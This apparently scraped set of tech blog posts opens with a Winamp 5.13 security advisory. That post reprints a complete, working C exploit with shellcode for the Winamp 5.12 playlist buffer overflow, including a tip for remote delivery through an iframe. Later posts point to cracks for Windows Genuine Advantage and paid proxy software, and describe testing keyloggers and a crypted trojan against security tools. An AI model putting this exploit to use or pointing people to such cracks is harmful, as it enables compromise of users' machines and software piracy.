NullSoft has released Winamp version 5.13 on 1/30/06 that fixes an “EXTREMELY” critical security vulnerability in (in_mp3).
Everyone is extremely recommended to update to the latest version.


ATmaCA has discovered a vulnerability in Winamp, which can be exploited by malicious people to compromise a user’s system.
The vulnerability is caused due to a boundary error during the handling of filenames including a UNC path with a long computer name. This can be exploited to cause a buffer overflow via a specially crafted playlist containing a filename with an overly long computer name (about 1040 bytes).
Successful exploitation allows execution of arbitrary code on a user’s system when e.g. a malicious website is visited.
The vulnerability has been confirmed in version 5.12. Other versions may also be affected.

[ Download Winamp v5.13 Setup ]
Or you can alternatively download the in_mp3.dll and place it in your Winamp\Plugins folder.

For computer security wizards, you can take a look at the exploit code below.
I do not take any responsibility that can/has been done with the code below as it is widely and publicly available.

/*
*
* Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day)
* Bug discovered & exploit coded by ATmaCA
* Web: http://www.spyinstructors.com && http://www.atmacasoft.com
* E-Mail: [email protected]
* Credit to Kozan
*
*/

/*
*
* Tested with :
* Winamp 5.12 on Win XP Pro Sp2
*
*/

/*
* Usage:
*
* Execute exploit, it will create “crafted.pls” in current directory.
* Duble click the file, or single click right and then select “open”.
* And Winamp will launch a Calculator (calc.exe)
*
*/

/*
*
* For to use it remotely,
* make a html page containing an iframe linking to the .pls file.
*
* http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm
*
*/

#include
#include

#define BUF_LEN 0x045D
#define PLAYLIST_FILE “crafted.pls”

char szPlayListHeader1[] = “\r\nFile1=”;
char szPlayListHeader2[] = “\r\nTitle1=~BOF~\r\nLength1=FFF\r\nNumberOfEntries=1\r\nVersion=2\r\n”;

// Jump to shellcode
char jumpcode[] = “\x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4″;

// Harmless Calc.exe
char shellcode[] =
“\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02″
“\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48″
“\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4″
“\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12″
“\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69″
“\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6″
“\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5″
“\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21″
“\x61\xdd\x0e\x4d”;

int main(int argc,char *argv[])
{
printf(“\nWinamp 5.12 Remote Buffer Overflow Universal Exploit”);
printf(“\nBug discovered & exploit coded by ATmaCA”);
printf(“\nWeb: http://www.spyinstructors.com && http://www.atmacasoft.com”);
printf(“\nE-Mail: [email protected]”);
printf(“\nCredit to Kozan”);

FILE *File;
char *pszBuffer;

if ( (File = fopen(PLAYLIST_FILE,”w+b”)) == NULL ) {
printf(“\n [Err:] fopen()”);
exit(1);
}

pszBuffer = (char*)malloc(BUF_LEN);
memset(pszBuffer,0×90,BUF_LEN);
memcpy(pszBuffer,szPlayListHeader1,sizeof(szPlayListHeader1)-1);
memcpy(pszBuffer+0x036C,shellcode,sizeof(shellcode)-1);
memcpy(pszBuffer+0×0412,jumpcode,sizeof(jumpcode)-1);
memcpy(pszBuffer+0×0422,szPlayListHeader2,sizeof(szPlayListHeader2)-1);

fwrite(pszBuffer, BUF_LEN, 1,File);
fclose(File);

printf(“\n\n” PLAYLIST_FILE ” has been created in the current directory.\n”);
return 1;
}

// milw0rm.com [2006-01-29]

I’ve seen many cases that movies downloaded from Internet can’t be played properly… A normal downloaded movie is around 700MB and it takes hours to complete downloading it. It’s surely frustrating that you wasted hours downloading a movie that you eagerly want to watch but then you only get the sound but no video. Or, you get only the video but no sound. You’ll be cursing the person who rip the video and uploaded the video file.

Before doing that and deleting the downloaded movie away, you are very likely to be able to play the movie perfectly together with the audio and video IF you have the correct codec installed. A codec is a device or program capable of performing encoding and decoding on a digital data stream or signal. Different rippers use different codecs to rip the movie off a CD or DVD. So in order to play correctly, you need to install the codec that’s used to rip the disc.

Thankfully there are a few good tools that that supplies technical and tag information about a video or audio file.


I found 3 free tools that is able to tell you what codec is necessary in order to play a video or audio file.

1. MediaInfo

When you load a movie file into MediaInfo, it’ll give you the following information.
General: title, author, director, album, track number, date, duration…
Video: codec, aspect, fps, bitrate…
Audio: codec, sample rate, channels, language, bitrate…
Text: language of subtitle
Chapters: number of chapters, list of chapters

I like this tool as it’s not very complicated by giving you the unnecessary information. Simply load the movie file, it’ll detect what video and audio required to play. There’s a button on the main interface where you can click to go to the official website of the video codec or audio codec. Download the codec, install it and you’re all set to watch the downloaded video.

[ Download MediaInfo ]

2. AVIcodec

AVIcodec is able to tell you the codec required and where to download it. It is able to read AVI & DIVX, ASF & WMV, Real (.rm, .rmvb), Ogg (.ogg, .ogm), Mpeg-(S)VCD-DVD (.mpg, .vob), FLV and all those handled by DirectShow (.mp3, …). Just load the video or audio file, and it will show you the information. Clicking on the small “web” button will bring you to the official website to download the codec.

Current AVIcodec version is quite outdated. There’s a newer version for beta test which is said to be available till end of March 2007, but it’s still available. Looks like AVIcodec is not actively being developed.

[ Download AVIcodec ]

3. afreeCodecVT

Easily determine the Audio and Video codec required to view your video. Once the codec or problem is determined; you may easily search for the codec or tool to solve your issue using the software.

Only reads AVI files. It doesn’t bring you to the official website to download the required codecs. Searching for codec download links in afreeCodec and afreeDLL doesn’t work. The link where it says “View a scenario in which afreeCodecVT is used to solve a issue.” in HELP section doesn’t work. Codec wizard doesn’t work as well. A lot of function in this tool will bring you to afreeCodecVT’s website but I think the website has changed and this tool doesn’t point to the correct page.

[ Download afreeCodecVT ]

4. GSpot

There is no need to install GSpot. Just download, extract and run GSpot.exe. GSpot is able to tell you whether you’ve installed the codec required to play the movie file you examine. If it says “Codec(s) are Installed”, then you can play without problems. If it says “Codec(s) are NOT Installed”, then you have to manually search for the codecs in Google. Would be nice if it has a database of direct link to download the required codecs.

[ Download GSpot ]

From all 4 codec recognition tools above, I prefer to use MediaInfo. It is able to support many types of files and recognize many codecs. MediaInfo is actively being developed and don’t require any installation. It also brings you to the correct website to download the official required codec.

Update: Sorry guys, totally forgotten about GSpot which is the most famous of them all. Just updated this post with GSpot.

Download Movies Download Movies

I found cracks for Windows Genuine Advantage Validation v1.5.554 and v1.5.708. I went to Windows Update and didn’t find any KB905474 updates as I am still using WGA 1.5.540. Team CRUDE cracked Windows Genuine Advantage Validation v1.5.554 on 2nd October 2006 and they claimed that it is the newest Windows Genuine Advantage from Microsoft. A day later on 3rd October 2006, Team ETH0 released a newer version which is v1.5.708 and they claim that this is the same crack that Microsoft shipped with their Windows XP release some days ago.

Anyway, if you’ve installed the either of the WGA versions above, you can get the cracks at the end of this post.


Team CRUDE’s crack for Windows Genuine Advantage Validation v1.5.554.0 contains cracked LegitCheckControl.dll, WgaLogon.dll and WgaTray.exe. You need to replace the files in your Windows System32 directory. If it says that the file is in use, you’ll need to boot into Safe Mode to replace the files.

As for Team ETH0, it comes with LegitCheckControl.DLL, WgaLogon.dll, WgaTray.exe and an additional batch file installer.bat. Just run the installer.bat file and it will auto kill wgatray.exe process and auto replace LegitCheckControl.DLL, WgaLogon.dll and WgaTray.exe file. Much simpler.

Remember, Team CRUDE’s crack is for WGA v1.5.554 and Team ETH0′s crack is for WGA v1.5.708. Don’t be confused with both different versions! I noticed that Team ETH0′s LegitCheckControl.dll doesn’t have Digital Signatures on it when view the file properties.

[Download Team CRUDE Windows Genuine Advantage Validation v1.5.554.0]
[Download Team ETH0 Windows Genuine Advantage Validation v1.5.708.0]

Probably some of you have heard of BootVis, which can be used to check how long a Windows XP machine takes to boot, and then to optimize the boot process, sometimes considerably reducing the time required. BootVis can be considered as a very useful tool but unfortunately it can only work in Windows XP and it is no longer being supported by Microsoft. There is another alternative called Boot Log XP which is a shareware. It is easier to use compared to BootVis and it gives you important information about started drivers, running processes and loaded DLLs. Boot Log XP also only works on XP because it extracts information from binary ETL file (as BootVis) and interprets results using our own method.

The author of Boot Log XP claims that they are working on a new version which will support XP-64 and for Windows Vista/Seven but it’s been a long time they posted that on their website without any updates. So if you’re on Windows Vista or 7, you can use WinBootInfo as Bootvis alternative.


WinBootInfo is the advanced Windows Boot Analyzer that logs drivers and applications loaded during system boot, measures Windows boot times, records CPU and I/O activity during the boot, and much more! With WinBootInfo, you get to know what actually happens during Windows boot and what process is taking up a long time to start that makes Windows bootup time slower.

WinBootInfo Features:

Windows Boot Time Logging

Detailed information about loaded drivers, applications and system DLLs

Each loaded system component is displayed on the detailed time map

Tree-View of Loaded Processes sorted in time, with all belonging DLLs/Drivers

Different times logged (boot to Login Prompt, Explorer, Session Manager)

Detailed CPU utilization tracking during boot, per every CPU core

I/O activity tracking during boot

System Interrupt / Context Switch tracking during boot

Text Log generation and Printing

History Feature, for comparing current with the past boot results

WinBootInfo is very easy to use. The first time you run it, the program will inform you that there is no boot analysis data recorded and ask if you you want WinBootInfo to log your next Windows boot and collect boot information for analysis.

Clicking Yes will schedule WinBootInfo to track what is being loaded at next restart. The screenshot below shows boot performance. The Boot Process Tree which is on the left shows the process being loaded in order by Windows during startup. In the middle it has detailed boot load history for drivers and applications, and at the bottom it also shows the CPU and disk utilization history during boot.

WinBootInfo only tells you what are being loaded and you will need other software such as Autoruns to disable the process from startup. WinBootInfo is probably the ONLY software in the world that is able to do what it does unless BootLogXP is able to come up with a new version… It cost $14.95 to purchase a single license but you can use it for 30 day free trial without limitations. Although the product page did not mention that it supports Windows 7, but I’ve got confirmation from the author of WinBootInfo that it does. In fact I’ve personally tested WinBootInfo on my Windows 7 Ultimate 32bit and it works perfectly.

[ Download WinBootInfo ]

If you didn’t know, Microsoft Windows does not allow you to autorun USB drives when they are inserted. The Windows Autorun capabilities are restricted to CD-ROM drives and fixed disk drives. No, there are no registry hacks to enable USB drives autorun feature because of security issues. Data theft is one security concern for example. The simplicity of reading and writing to basic USB drives and the reasonable amount of data they can hold makes them an ideal target for this.

Usually when you plug in your USB flash drive, you’ll get a notification asking you what would you like to do.

If your end “Explorer.exe” process, and you plug in your USB flash drive, you won’t even get the prompt. Usually computers that are used for giving exams won’t have “explorer.exe” loaded and that can prevent you from copying the exam data out.

Anyway, if you still would like to automatically launch the program of your choice on your USB Flash Drive everytime you plug it in your computer, then please continue reading. There is a way to make Windows autorun USB flash drives.


Since Windows does not allow flash drive to automatically auto execute any programs, we’ll turn to 3rd party software to do that. I found a few and here is what I have to say about it.

1. AutoRun USB

If you visit AutoRun USB official website now, they no longer offering free version of AutoRun USB. Their latest version of AutoRun USB is version 4 and it cost $4.99. But if you don’t mind using their first version of AutoRun USB, then you can use it for FREE. One thing I don’t like about AutoRun USB is it recognizes autorun.usb instead of autorun.inf. Why don’t they make it standard? You need to manually copy the autorun.usb from C:\Program Files\AutoRun USB to the root of your USB flash drive and edit it with notepad.

[ Download AutoRun USB v1.0 ]

2. BusRunner

If you think AutoRun USB is bad, this is even worst! First of all, I can’t find anything about BusRunner on the official website. Looks like they’ve removed it for good! Next, after installing BusRunner, I see an icon appear at your tray bar. When I plug in my USB flash drive, I can right click on the icon to set the default program to run when it’s plugged in. After I did that, I wasn’t able to safely remove my USB flash drive. I get the error message “Problem Ejecting USB Mass Storage Device. The device ‘Generic volume’ cannot be stopped right now. Try stopping the device again later.” No matter how long I wait, I still won’t be able to safely eject my USB flash drive. The only safe way to eject my USB flash drive is to close BusRunner first, then only I am able to safely remove my USB flash drive. Oh, and BusRunner also doesn’t recognize Autorun.inf. It uses BusRunner.cfg file at the root of your USB flash drive.

[ Download BusRunner ]

3. APO USB Autorun

This is the best if compared with the first two software to can make Windows autorun USB flash drives. APO USB Autorun recognizes the standard autorun.inf (as used with CDs) and executes it. If you don’t know how to write autorun.inf file, this software includes an autorun.inf builder. In addition to the autorun functionality, the program also allows you to quickly access the files on the USB drive(s) from the tray icon menu. APO USB Autorun now comes with plugins to backup/restore folder upon drive insertion.

[ Download APO USB Autorun ]

On December last year I found out about Windows Live Messenger 2009 and mistakenly thought it was official final version but it was actually a public beta. Anyway I installed it on my laptop and is using it until today. So far it has been perfect and never got any problems with it. While I was back in my home town for two weeks last month, I wanted to see my wife from her webcam in her laptop but the “Show my webcam” option has been grayed out. I used TeamViewer to remotely control the computer and ran Audio and video setup, the webcam test was fine… Weirdly the “Start a video call” worked as well.

As you all know, the Internet connection in my hometown is really slow and the video call between me and my wife is terribly slow and I could only see her 1 frame in . I didn’t want to use video call because it requires more bandwidth to transfer both audio and video compared to Show My Webcam which only streams the video. I wasn’t able to find a solution at that time but today I’ve found a workaround to enable Show My Webcam on Windows Live Messenger 2009.


Only my new Acer laptop running Windows Vista with Windows Live Messenger 2009 has the show my webcam missing problem but it was fine on my old laptop that’s running Windows XP with Windows Live Messenger 2009. First thing I did was to uninstall WLM 2009 and then do a reinstallation but no go. Then I thought that the problem could be caused by the Acer Crystal Eye Webcam that is installed by default, so I uninstalled it but still couldn’t use show my webcam option. I also read that antivirus could cause such problems. I terminated Kaspersky Antivirus 2009, all connections has been reset and I had to reconnect the Windows Live Messenger 2009. Suddenly the Show my webcam option is AVAILABLE! I then tried to show my webcam and it worked!

OK I hit the jackpot and thought it was Kaspersky but I was wrong. I rebooted the computer, terminated Kaspersky, ran Windows Live Messenger 2009, connected but this time the show my webcam option is again unavailable. I had to uninstall Kaspersky to confirm that it is not the cause of the problem but still the same. So it’s not Kaspersky…

After further testing, I found out that the show my webcam will be available after syncing the Windows Live Messenger 2009 connection. What you need to do is to run Windows Live Messenger 2009 and sign in as usual. Once you’re signed in, click the small button on the top right, select File > Sign Out.

When you’ve successfully signed out, sign in again. Weirdly that will enable the show my webcam option.

There’s no such problem on my old laptop which I manually installed Windows XP and Vista with external webcam. I am not sure what is the cause of this problem but I believe it should have something to do with either some of the pre-installed software/driver by Acer or the build-in webcam on my new laptop. Well Windows Live Messenger 2009 is still in public beta, so it is expected to have some bugs. With this workaround, I don’t need to revert back to the old Messenger 8.5 and can continue using the beautiful Windows Live Messenger 2009 😉

If we want to know whether a file contains virus or not is by downloading the file to our computer first and then let the antivirus that is installed on our computer do the job. Or another method is to also download the suspicious file to our computer and then upload it to Virustotal or independant antivirus website for scanning. I get a little upset yesterday when I wanted to send a link that contains photos taken during my wedding to a friend in an archive (.zip) file. The first thing that she asked was is that a virus? Are you sending something awful to me? Even after I said that it’s my wedding photo, she still didn’t dare to download because her computer friend told her not to simply download stuff from the Internet…

I don’t know what kind of computer friend she had but am sure he/she is a newbie that is just too afraid too download anything over the Internet even from a trusted friend. If one antivirus doesn’t give her any confidence, then maybe over 40 antivirus in VirusTotal scanning that one file should do it. However that requires her to download the file to her computer first. To solve this problem, here’s a way to scan files with 22 antivirus engines without first downloading it to your computer.


NoVirusThanks, a website that offers free service to analyze your file with 22 AntiVirus Engines and will report back the analysis result has now included a new feature to scan web address. Last year I’ve written about NoVirusThanks but back then it didn’t have such feature.

The new “Scan Web Address” option allow users to scan a file before they download it in their own computer. You can scan, for example, the file located in www.site.com/file.exe before download it in your computer. It can also be used to scan a single web page .html/.php/.js with all the Antivirus engines. Sometimes when a direct download link to a file is being hidden, Scan Web Address can also handle the redirection or any changes in the filename. Other than that, the online scanning feature by NoVirusThanks has been recently optimized for stability and with improved binder detector.

Let me walk you through it on how to scan a file without downloading it to your computer using NoVirusThanks.

1. Find the link that you want to scan. Let’s take DPC Latency Checker for an example. Visit the official DPC Latency Checker download page.

2. Right click on the link that lets you download the file and select Copy Link Location.

3. Now go to NoVirusThanks and click Scan Web Address tab.

4. Right click on the box just below the text that says “Web Address to Scan”, select Paste and finally click the Submit Address button.

5. Wait for about a minute and you will have your report on how many antivirus detected the file as infected.

The advantage of this feature allows you to save your time and bandwidth if you are on a limited plan from your ISP. Other than that, people with fear from downloading files over the Internet can now feel safer to download. I believe the maximum file size limit to scan is 20MB. I tried scanning Kaspersky Anti-Virus 2010 v9.0.0.463 installer file (kav9.0.0.463en.exe) but got the error “Could not fetch the requested address: Failed writing body”.

We all know that we can do nearly everything with Firefox browser. We can check emails, download torrents, upload files to FTP, and the list goes on… Did you know that there’s a collection of extensions to turn your Firefox browser into a security platform? FireCAT stands for FireFox Catalog of Auditing Toolbox and it is a Firefox Framework Map collection of the most useful security oriented extensions. It can be used to turn your favorite browser (Firefox) into a powerful security framework.



At first I thought that FireCAT is a Firefox plugin which you can install and automatically have all 60 security extensions but I was wrong. The official website has 3 types of FireCAT files, FireCAT 1.2 Source (FreeMind), FireCAT 1.2 HTML Browsable and FireCAT 1.2 PDF. Just download the HTML browsable file and you’ll see 7 categories. Expanding the category will give you the place to download the specific extension.

1. Information Gathering
2. Proxying / Web Utilities
3. Editors
4. Security auditing
5. Network Utilities
6. Misc
7. IT Security Related

If you don’t want to try those security extensions on your Firefox browser because it might affect your browser speed, then I suggest you to install it on a Portable Firefox. This way you can have a clean and fast Firefox for browsing and then another Firefox for security auditing. Do take note that you can only run either the installed Firefox on your system or the Portable Firefox at a time.

So which is your favorite Firefox security extension featured in FireCAT?

[ Download FireCAT 1.2 HTML | PDF ]

I’ve found two application that is classified as Deny-A-Buddy (DenyBuddy & No-Buddy) program which allows you to remove your Yahoo! ID from someone elses buddy list. Quick and effective…

Simply login to the name you need to remove and then enter the persons id that you need to remove your name from and then remove it.


1. DenyBuddy

[ Download DenyBuddy ]

2. No-Buddy

[ Download No-Buddy ]

I personally prefer to use DenyBuddy because it has better status reporting than No-Buddy. It will tell you if you’ve signed on, removed your Yahoo! ID from someone elses buddy list, and even closing the application. Even the DenyBuddy Graphical User Interface (GUI) looks better than No-Buddy.

An open proxy is a proxy server which is accessible by any Internet user. Generally, a proxy server allows users within a network group to store and forward internet services such as DNS or web pages so that the bandwidth used by the group is reduced and controlled. With an “open” proxy, however, any user on the Internet is able to use this forwarding service. Most of the time the owner of the proxy server doesn’t know that he/she is running an “open” proxy because of the proxy software misconfiguration. I still remember that the first IT company that I worked in 10 years ago had a Microsoft Proxy server in the network and it is an open proxy.

Open proxy is most commonly used to mask the user’s IP address. It could be to bypass censorship, privacy, or even to avoid detection. To be able to use the open proxy, a software such as Internet Explorer must support using proxy server. Go to Tools > Internet Options > Connections tab > LAN settings. Check “Use a proxy server for your LAN” and enter the proxy IP address and port. Now when you surf the web, the site can’t see your original IP address. Check out the animation below. I visit www.cmyip.com to view my original IP address. Then I configure Internet Explorer to use an open proxy. Refreshing www.cmyip.com website shows the open proxy instead of my original IP.

Unfortunately not all software supports proxy server. If for some reason you need a software to go through a proxy server, here are some third party software that you can use to tunnel windows applications through proxy servers.


There are some freeware such as FreeCap, Hummingbird and SocksCap which is able to redirect connections from programs through SOCKS or Proxy server. I am not going to talk about the free proxy tunneling software because some of them can be really tough to configure for a basic computer user.

However, the paid ones such as Proxifier, ProxyCap and WideCap are way easier to configure and use. So let’s take a look at it.

1. Proxifier

– Proxifier is a program that allows network applications that do not support working through proxy servers to operate through an HTTPS or SOCKS proxy or a chain of proxy servers. With Proxifier you can easily tunnel all connections on the system or separate applications. By default, Proxifier will tunnel all connections automatically after the installation. No configuration needed, however you’ll need to look for open proxy servers and add them to proxy settings. The latest Proxifier v2.7 cost $39.95 for a single user license, but it has been cracked by MAZE (Proxifier.v2.7.Cracked-MAZE)

[ Download Proxifier ]

2. ProxyCap

– ProxyCap enables you to tunnel Internet applications through HTTP, SOCKS v4, and SOCKS v5 Proxy Servers. You can tell ProxyCap which applications will connect to the Internet through a proxy and under what circumstances. This is done through a user friendly interface, without the need to reconfigure any of your Internet clients. ProxyCap provides flexible rule system and allows you to define your own “tunneling” rules. After installation, you’ll need to add a proxy server and then set a rule whether to allow all or specified programs to tunnel through the proxy server. The latest ProxyCap v3.15 cost $30 for a single user license but has been cracked by NJOY from Revenge Crew (ProxyCap.3.15.Crack-REV)

[ Download ProxyCap ]

3. WideCap

– WideCap is system proxifier. It was created as an extended version of FreeCap program with a fully rewritten proxy engine to handle reloading everything on-the-fly. WideCap is fully functional Winsock Service and Namespace provider. That means simply integration into your network subsystem. FreeCap uses injection technology which could cause errors and incompatible problems with some firewalls and anti-viruses. WideCap acts as virtual network driver covering all your TCP/IP activity. No launchers – just run your program as usual and work via proxy. I spent half an hour trying to get WideCap to work because I was unable to get the rules working. Finally I found out that I need to add ANY for address that should go through Proxy. The latest version of WideCap v1.4 cost $20 for 1 license but also has been cracked by lord_Phoenix from Revenge Crew (widecap.1.4.0.539.read.nfo.cracked.exe-rev).

[ Download WideCap ]

Proxifier is the easiest to use with no configuration needed while WideCap is the most advanced proxy tunneling software if compared with the other two. Do take note that WideCap conflicts with other proxy tunneling software. I had to uninstall Proxifier and ProxyCap to get WideCap working.

John Weis, Software Test Engineer for MSN Messenger, posted an update to the now official 7.5.0322 version.
Build 324 only includes a one-line fix, but if you’re still having problems with 322 you’re advised to try this one.
Important Note: If your 322 is working fine, you don’t have to upgrade.

[ Download MSN Messenger 7.5.0324 (unofficial, English-only build) ]

9 February 2006 Update: 7.5.0.324 is now OFFICIAL! Download the OFFICIAL MSN Messenger 7.5.0.324 at this link.

I personally think that keylogger is the most scariest threat. Imagine all your passwords being captured and the person who installed the keylogger is able to access all your password protected websites such as your emails, paypal, online banking and etc. One of the most effective method to counter keylogger is by using Zemana AntiLogger.

Zemana AntiLogger is one of the security products that I’ve recommended and will continue to recommend to everyone. The last time I tested Zemana AntiLogger and it was able to block virtually ALL keylogging, webcam capture and screenshot capture methods from different trojans. A year has gone by and again I’ve tested Zemana AntiLogger with 2 keyloggers (one of it uses rootkit method and the other advertises that it is completely invisible bypassing antivirus and firewall) and 1 trojan crypted with incognito which by bypassed many antivirus and internet security products. Zemana AntiLogger was able to detect injection on both of the keyloggers and the trojan while successfully blocking the installation of those dangerous files.

Zemana has collaborated with Softpedia to offer everyone FREE license for Zemana AntiLogger ONLY FOR TODAY. Hurry and grab your license as soon as possible.


To get your free Zemana AntiLogger license worth $39.50:
1. Go to this page http://www.zemana.com/softpedia/
2. Click the FREE Full Version Download Now button to download the installer AntiLogger_SOFTPEDIA_1.9.2.185.exe
3. Install and reboot your computer
4. Activate the program by following the on-screen instructions.

Zemana AntiLogger is easy to use. Just install and let it protect your computer. It is made to protect your computer real-time without relying on virus signatures so you won’t find any Scan button. Most if not all injections are threats, so if you get such warnings, make sure you block them first.

I believe the installer that is custom built for Softpedia which has the license number integrated to activate the program. I am not sure whether is it still possible to continue activate the license using the custom installer when this promo is expired. If the activation is limited to only today, that means if we reformat our hard drive we wouldn’t be able to use Zemana AntiLogger for free anymore. I’ve did some tracing and found that the activated license information is stored in C:\Program Files\AntiLogger\config.cfg. You can backup the config.cfg and restore it at a later time IF the online activation blocks the SOFTPEDIA-OEM-12809 license number. If you starting to think about piracy using the config.cfg, you will not succeed because the license is hardware dependent and if you transfer the config.cfg on another computer, it won’t work.

One thing I noticed about Zemana AntiLogger is it doesn’t aggressively checks the current process for threats. One example is, I am using Input Director to share keyboard and mouse between computers and it took a while before Zemana found out that Input Director is capturing the screen. Not to worry because I’ve tried turning off Zemana and then install a keylogger that auto uploads captured data but I’ve waited 30 minutes and still didn’t receive any captured data. I assume that although Zemana AntiLogger haven’t detect the threat, but it can block sensitive data from being transferred.

You can install and run Zemana AntiLogger together with your antivirus. Check here for a list of compatible security products. You have no idea how many undetectable threats out there today and relying solely on just antivirus itself is not enough to keep your personal data safe. Go tell your friends and families about this promotion.

Update: Zemana AntiLogger is only compatible with Windows XP with Service Pack 2 or higher, Vista and 7 32 bit ONLY. AntiLogger is not available for 64-bit Windows.

If you go to the official DefenseWall’s website which is at SoftSphere Technologies, you will find DefenseWall HIPS v2.56 but not the Personal Firewall v3 version. That’s because the v2.56 is about to be dropped and replaced with the new DefenseWall Personal Firewall v3. I’ve long heard of DefenseWall but has never given it a try but since I’ve been contacted by people from SoftSphere to do a review on v3, I’ve decided to test it out. DefenseWall claims to protect yourself from malicious software (spyware, botnets, adware, keyloggers, rootkits, etc.) and identification theft, that can not be stopped by your anti-virus and anti-spyware programs, when you surf the Internet.

I’ve been testing a lot on antivirus and this is actually my first time testing a HIPS software. This is nothing like the normal antivirus that you use. Well virus normally comes in to your computer from either the web browser, email, USB drives or network. If you disable all of them, it’s impossible that your computer will be infected by virus but who can live without an internet connection nowadays? So what DefenseWall does is it labels all those applications that comes from location where virus can come in as “Untrusted” and run them in limited rights in a virtual zone that is specially allocated for them.


Here is an example. Lets say you downloaded a file using BitTorrent. Scanned it with your antivirus and it didn’t warn you that it is a threat. Then you run it thinking that its safe and the virus started to modify the system settings such as disabling Windows Task Manager, regedit, adding autostartup to the virus and etc. Well thanks to DefenseWall, you got nothing to be afraid of because all the damages done by the virus only affects the virtual zone and not your real Windows system. With only a reboot, your system is back to normal and the damages done by the virus will be restored. Now this is very different from system snapshot software because a snapshot reverts everything back to a specific date. As for DefenseWall, everything is still intact except for the damages that the virus seems to have done. That is how a HIPS software supposed to work according to the description and manual. I’ve put DefenseWall to the test and it managed to block the threat in some way or another.

Test 1: Install Rootkit based Keylogger
There is a keylogger that goes by the name of All In One Keylogger for Windows by RelyTec. It uses rootkit method to hide itself so that it is harder to detect. When I downloaded it using Firefox, the keylogger installer file automatically being labeled as Untrusted file. Installed it and after a few seconds DefenseWall tells me that it found a process reading keystrokes via GetKeyState method.

I clicked the Terminate button and the keylogger process immediately got terminated. I rebooted the computer and the keylogger is no longer running but the files are still in the computer. As long as the keylogger doesn’t auto load when Windows is booted up, then you’re safe.

Test 2: Install Keylogger that bypasses antivirus and firewall
Probably the most expensive and popular keylogger in the world WebWatcher that cost $169.95 per year claims to bypass antivirus and firewall. There’s no trial for it and I had to pay the full price in order to test this. With DefenseWall running, I couldn’t get WebWatcher keylogger installed until I turn off the HIPS protection. So I turn off the HIPS protection, installed WebWatcher and DefenseWall didn’t detect any process reading keystrokes. I wouldn’t say DefenseWall failed this test because it managed to block WebWatcher from sending the keylogs and screenshot data to WebWatcher’s servers, making the keylogger useless.

Test 3: Install a crypted Bifrost trojan
I wanted to simulate a real scenario where a normal user unknowingly downloads a trojan from a website and then gets infected. I uploaded the Bifrost trojan crypted with Incognito to a website and then download it to my test computer using Firefox which is flagged as Untrusted by DefenseWall. I ran the trojan and DefenseWall managed to block it. I rebooted the computer and no sign of the trojan running in background.

Test 4: Run 20 different type of virus from network share
This is the last hardcore test which I did. I dropped 20 different virus on another computer and shared the folder. Then on my test computer with DefenseWall installed, I access the shared folder that contains 20 different type of virus and ran ALL of them! It created so much havoc on the test computer that it made Windows blue screen and auto reboot. To my surprise, when Windows is booted up, everything is back to normal like nothing ever happened. By default DefenseWall categorize network shared folders as Untrusted.

As long as you run ANY malicious files as Untrusted, your computer will be fine. However when you want to install legitimate software like Kaspersky Anti-Virus, you must remember to run it as “trusted” or else the installation will fail. So if you’re unsure, always run it as Untrusted and see what happens. The feature that I liked most in DefenseWall is the Events Log. I am able to see what the untrusted file is trying to open or do to my computer.

There are some other useful small features which is file and registry rollback which you can easily use to manually cleanup the debris left behind on your hard drive by malware after an infection attempt. The “Go Banking/Shopping” button is a special browser mode that allows safe access to online banking. While in this mode, your information is protected from untrusted computer processes by terminating all untrusted process.

Please be informed that this is NOT meant to be a replacement software for an antivirus but you can run it together. DefenseWall does not protect from file drops as many programs need to drop a file in order to run successfully (such as FireFox) and there is no security risk when a file is dropped (only when it is loaded into memory). Therefore, if the program is prevented from running in the memory, we can classify this as protected. Your antivirus will be useful in detecting these malicious files that has been dropped into your computer. DefenseWall is very light on your computer as it takes up only 14.6MB of memory and its peak is only 17.1MB.

SoftSphere Technologies, the maker of DefenseWall is very generous and kind to offer 75 one year license worth over $2000 to Raymond.CC readers. If you would like to win a license, write a comment at the end of this article and I will pick the 75 winners 24 hours later. Your email will be sent to SoftSphere and they will be contacting you.

[ Visit SoftSphere Technologies ]

Update: 75 lucky winners has been randomly selected. Your email contact has been sent to SoftSphere and they will be contacting you.

We have already covered RegFromApp where you can use it to track real time registry changes by injecting it into the process that you want to trace. Other than tracking what registry changes are being made to a computer, it is also equally important to track the changes on folders. Here is a simple tool called Track Folder Changes which you can use to track real time changes on folders that you specify. By default, Track Folder Changes tracks the whole C:\ drive where normally the operating system is installed. You can easily change the folder that you want to monitor by clicking the browse button. Upon running Track Folder Changes, it instantly displays in real time a tree with the list of created/deleted/changed files in a specific directory and its subdirectories. The coloring on the files helps to easily determine if a file is deleted, modified or created.


Folder monitoring tools can be very useful to track installation or uninstallation changes and etc. In fact it can even be used to detect if there is a keylogger monitoring your keystrokes and saving them to a log file. Remember that Track Folder Changes is able to detect files that are being “modified” which means when the keylogger saves the keystrokes to a log file, Track Folder Changes will be able to catch it. However it will still require human intelligence to determine if the file is indeed used by a keylogger. Below is an example of detecting a DarkComet RAT trojan with keylogging enabled with Track Folder Changes.

A .dc file located in TEMP folder constantly appears to be modified even after clearing the results.

When opened the .dc file with Notepad, it looks like a log file of captured keystrokes.

